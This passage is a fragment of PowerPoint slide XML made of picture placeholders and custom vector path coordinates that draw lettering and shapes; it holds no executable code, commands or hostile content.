                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="110385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="98288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13628" y="77118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="66533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24227" y="57460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31799" y="46875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39370" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48455" y="31754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57541" y="24194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68140" y="18145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78740" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89340" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99939" y="3024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124167" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146881" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158995" y="3024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9" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51C0DF3E-9FBA-CA7D-55C8-73D59908334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0092" y="3703378"/>
              <a:ext cx="139310" cy="193552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E804D8-E605-1CB9-B8E5-B56CE2B18964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51036" y="3693597"/>
              <a:ext cx="278620" cy="400050"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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20CF9BE1-8B54-4A1E-5D30-F38CC1658EB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7092054" y="4695475"/>
              <a:ext cx="713105" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="23307" y="4066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="54617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="54617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="4066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81036" y="54617"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57729" y="54617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57729" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="54617"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81036" y="4066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57729" y="4066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57729" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="4066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168640" y="39325"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135149" y="39325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139680" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145817" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147361" y="45514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147361" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140920" y="50005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134722" y="50572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100869" y="69910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100925" y="81249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103063" y="86235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112001" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112296" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117227" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126432" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128972" y="96015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="87206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="87206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131918" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129906" y="81249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127305" y="80483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126208" y="79887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125273" y="79081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124298" y="78274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123688" y="77429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123201" y="75653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123079" y="70955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123668" y="69231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="62445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="62445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168640" y="39325"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168901" y="87206"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147239" y="87206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="87206"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168901" y="62445"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147239" y="62445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="76602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145532" y="78052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143561" y="79223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138767" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138471" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136856" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="62445"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="133706" y="24335"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128484" y="24335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123282" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112878" y="26407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109119" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106823" y="27732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106823" y="44179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108814" y="44179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110602" y="43490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113528" y="42511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121456" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121226" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125558" y="39325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168640" y="39325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166137" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160610" y="30069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155829" y="27560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149749" y="25768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142758" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143728" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133706" y="24335"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="230958" y="24396"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221144" y="24396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216145" y="25062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186498" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186598" y="67179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215596" y="95540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221042" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231507" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235652" y="95773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243130" y="93871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246385" y="92709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="90968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221713" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217161" y="78953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210740" y="72156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209135" y="67179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209135" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210699" y="49247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216958" y="41842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221449" y="39991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="39991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="29858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246768" y="28238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243110" y="26923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235246" y="24902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230958" y="24396"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250161" y="72338"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="247072" y="72338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246178" y="73188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245223" y="74057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230369" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="72338"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250161" y="39991"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229881" y="39991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232178" y="40286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236140" y="41458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247072" y="48487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="48487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="39991"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="288708" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266783" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266783" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="72056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294601" y="64792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319074" y="64792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313346" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="319074" y="64792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="294601" y="64792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313702" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339123" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319074" y="64792"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="337375" y="26277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="312178" y="26277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313346" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312889" y="55650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337375" y="26277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="386408" y="24152"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="350278" y="45628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347698" y="60746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348380" y="68783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372131" y="94024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372323" y="94024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380387" y="95672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390045" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395349" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400185" y="95804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408922" y="94024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413576" y="92587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="90604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385128" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379621" y="79479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372143" y="73814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370111" y="69727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369786" y="64387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419794" y="64387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419794" y="56741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419511" y="52749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419429" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369725" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370034" y="47012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370050" y="46768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371554" y="43269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376906" y="38959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380434" y="37807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415345" y="37807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415070" y="37221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411401" y="32558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406708" y="28880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400977" y="26253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394601" y="24768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395563" y="24768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386408" y="24152"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="418514" y="73066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="416075" y="73066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413576" y="74968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410162" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401506" y="80064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397035" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="73066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="415345" y="37807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="389171" y="37807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392524" y="38959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396812" y="43571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397850" y="46768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397929" y="47012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398051" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419429" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419268" y="49312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417879" y="43571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417805" y="43269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417693" y="42805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415345" y="37807"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="459601" y="26277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="437696" y="26277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437696" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="48792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462344" y="47820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464904" y="47132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469659" y="46323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="46323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="26277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487094" y="46323"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="480147" y="46323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482725" y="46526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484229" y="46768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485258" y="47132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="47132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="46323"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487094" y="26277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477770" y="26277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475674" y="26712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468582" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464396" y="32164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="26277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="590422" y="4066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="546327" y="4066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546327" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="64995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590727" y="64995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617503" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="21187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619065" y="21187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616107" y="15453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613323" y="12399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606638" y="8030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="603163" y="6543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595258" y="4561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590422" y="4066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="619065" y="21187"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="585159" y="21187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587516" y="21724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591784" y="23418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593369" y="24700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596132" y="28374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596803" y="30563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596803" y="35689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580262" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617503" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620191" y="40589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620902" y="36634"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620902" y="27368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620058" y="23418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619947" y="22898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619065" y="21187"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="684850" y="2306"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="674162" y="2306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="667822" y="3397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635939" y="35683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634862" y="42176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634862" y="57023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656706" y="91232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674263" y="96188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685520" y="96188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689077" y="95964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693548" y="95196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693737" y="95196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="88420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681802" y="78709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679130" y="78288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678963" y="78288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672739" y="76337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659084" y="55050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="659084" y="43988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681355" y="19783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="19783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712973" y="9830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688284" y="2517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684850" y="2306"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="712973" y="66815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="710535" y="66815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709458" y="67781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708056" y="68929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="704662" y="71585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702813" y="72832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700822" y="74001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699609" y="74752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698294" y="75535"/>
                  </a:lnTo>
                  <a:lnTo>
